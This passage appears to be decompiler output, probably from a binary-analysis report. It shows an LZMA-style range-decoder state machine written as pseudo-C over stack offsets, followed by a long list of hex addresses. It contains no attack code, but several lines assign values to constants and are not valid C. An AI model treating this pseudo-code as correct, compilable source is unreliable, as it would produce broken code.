												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                          0x00000000
                          0x004065d2
                          0x004065d2
                          0x004065d6
                          0x004065f7
                          0x004065fe
                          0x00406604
                          0x0040660a
                          0x0040661c
                          0x00406622
                          0x00406627
                          0x00000000
                          0x004065d8
                          0x004065de
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x004069a2
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069ee
                          0x00000000
                          0x00000000
                          0x004069f0
                          0x004069f4
                          0x00406ba3
                          0x00406bb9
                          0x00406bc1
                          0x00406bc8
                          0x00406bca
                          0x00406bd1
                          0x00406bd5
                          0x00406bd5
                          0x00406a00
                          0x00406a07
                          0x00406a0f
                          0x00406a12
                          0x00406a15
                          0x00406a15
                          0x00406a1b
                          0x00406a1b
                          0x004061b7
                          0x004061b7
                          0x004061b7
                          0x004061c0
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00000000
                          0x004061d1
                          0x00000000
                          0x00000000
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e4
                          0x00000000
                          0x00000000
                          0x004061ea
                          0x004061ed
                          0x004061ef
                          0x004061f0
                          0x004061f3
                          0x004061f5
                          0x004061f6
                          0x004061f8
                          0x004061fb
                          0x00406200
                          0x00406205
                          0x0040620e
                          0x00406221
                          0x00406224
                          0x00406230
                          0x00406258
                          0x0040625a
                          0x00406268
                          0x00406268
                          0x0040626c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040625c
                          0x0040625c
                          0x0040625f
                          0x00406260
                          0x00406260
                          0x00000000
                          0x0040625c
                          0x00406236
                          0x0040623b
                          0x0040623b
                          0x00406244
                          0x0040624c
                          0x0040624f
                          0x00000000
                          0x00406255
                          0x00406255
                          0x00000000
                          0x00406255
                          0x00000000
                          0x00406272
                          0x00406272
                          0x00406276
                          0x00406b22
                          0x00000000
                          0x00406b22
                          0x0040627f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406295
                          0x00406295
                          0x00406298
                          0x0040629c
                          0x00000000
                          0x00000000
                          0x0040629e
                          0x004062a4
                          0x004062ce
                          0x004062d4
                          0x004062db
                          0x00000000
                          0x004062db
                          0x004062aa
                          0x004062ad
                          0x004062b2
                          0x004062b2
                          0x004062bd
                          0x004062c5
                          0x004062c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040630d
                          0x00406313
                          0x00406316
                          0x00406323
                          0x0040632b
                          0x00000000
                          0x00000000
                          0x004062e2
                          0x004062e2
                          0x004062e6
                          0x00406b31
                          0x00000000
                          0x00406b31
                          0x004062f2
                          0x004062fd
                          0x004062fd
                          0x004062fd
                          0x00406300
